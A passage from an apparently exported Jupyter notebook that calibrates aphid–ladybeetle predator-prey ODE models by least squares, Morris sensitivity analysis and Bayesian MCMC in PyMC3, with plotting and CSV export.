rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[153]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_EP1, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_EP1.csv") # salvando em um csv para consultas
df_stats_summary
# In[154]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_EP1["EP1_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_EP1["EP1_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_EP1["EP1_model"], 50, axis=0)
# In[155]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_EP1.png", dpi=300)
plt.show()
# In[156]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_EP1.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_EP1.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[157]:
df_realizations
# # Exponential Prey Growth FR2 model
# ## The parameter a1 doesn't have a maximum threshold
# In[158]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def EP2_model(
t,
X,
r1 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
u, v = X
u_prime = r1 * u - a1 * u * v / ( a2 + a3 * u )
v_prime = 0
return u_prime, v_prime
def EP2_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
solution_ODE = solve_ivp(
fun=EP2_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,a1,a2,a3),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[159]:
def EP2_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[160]:
from scipy import optimize
seed = 1234
r1=0.000582078917707341
a1=0.020251827279105163
a2=1.4527465345998702e-05
a3=0.0024486050974377345
denom_min = 0.1
denom_max = 1.9
bounds_EP2 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_EP2 = optimize.differential_evolution(
EP2_least_squares_error_ode,
bounds=bounds_EP2,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
EP2_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_EP2)
# * Retrieving the calibrated parameter values:
# In[161]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_EP2.x
solution_ODE_EP2 = EP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_EP2.x
)
t_computed_EP2, y_computed_EP2 = solution_ODE_EP2.t, solution_ODE_EP2.y
u_EP2, v_EP2 = y_computed_EP2
parameters_dict = {
"Model": "EP2",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[162]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_EP2, u_EP2, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_EP2, v_EP2, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[163]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[164]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = EP2_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
EP2_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[165]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[166]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_EP2.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[167]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[168]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP2 = EP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP2.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[169]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[170]:
df_sigmai
# In[171]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_EP2.png", dpi=300)
plt.show()
# In[172]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_EP2.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[173]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[174]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_EP2,
u_EP2,
v_EP2,
EP2_model,
mean_values_params
)
pest_time_derivative_array
# In[175]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_EP2, u_EP2, '-x', label='Pest population')
plt.plot(t_computed_EP2, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_EP2.png", dpi=300)
plt.show()
# In[176]:
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[177]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP2 = EP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP2.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
EP2_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[178]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[179]:
df_sigmai
# In[180]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_EP2.png", dpi=300)
plt.show()
# In[181]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_EP2.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[182]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # a1
t.dscalar, # a2
t.dscalar, # a3
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def EP2_ode_wrapper(time_exp, r1, a1, a2, a3, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, a1, a2, a3]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
EP2_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[183]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_EP2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + percent_calibration) * a1,
)
a2_ = pm.Data("a2", a2)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP2_model",
EP2_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + percent_calibration) * a1,
)
a2_ = pm.Data("a2", a2)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP2_model",
EP2_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + percent_calibration) * a1,
)
a2_ = pm.Data("a2", a2)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP2_model",
EP2_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_EP2:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_EP2 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[184]:
plt.hist(trace_calibration_EP2['a1'], bins=35)
plt.show()
# In[185]:
calibration_variable_names = [
"std_deviation",
"a1",
"a3",
]
# In[186]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_EP2[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_EP2.png")
# In[187]:
az.plot_pair(
trace_calibration_EP2,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_EP2.png")
# In[188]:
df_stats_summary = az.summary(
data=trace_calibration_EP2,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[189]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[190]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_EP2, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_EP2.csv") # salvando em um csv para consultas
df_stats_summary
# In[191]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_EP2["EP2_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_EP2["EP2_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_EP2["EP2_model"], 50, axis=0)
# In[192]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_EP2.png", dpi=300)
plt.show()
# In[193]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_EP2.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_EP2.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[194]:
df_realizations
# # Exponential Prey Growth FR3 model
# ## The parameter a1 doesn't have a maximum threshold
# In[195]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def EP3_model(
t,
X,
r1 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
u, v = X
u_prime = r1 * u - a1 * u * u * v / ( a2 + a3 * u * u )
v_prime = 0
return u_prime, v_prime
def EP3_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
solution_ODE = solve_ivp(
fun=EP3_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,a1,a2,a3),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[196]:
def EP3_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
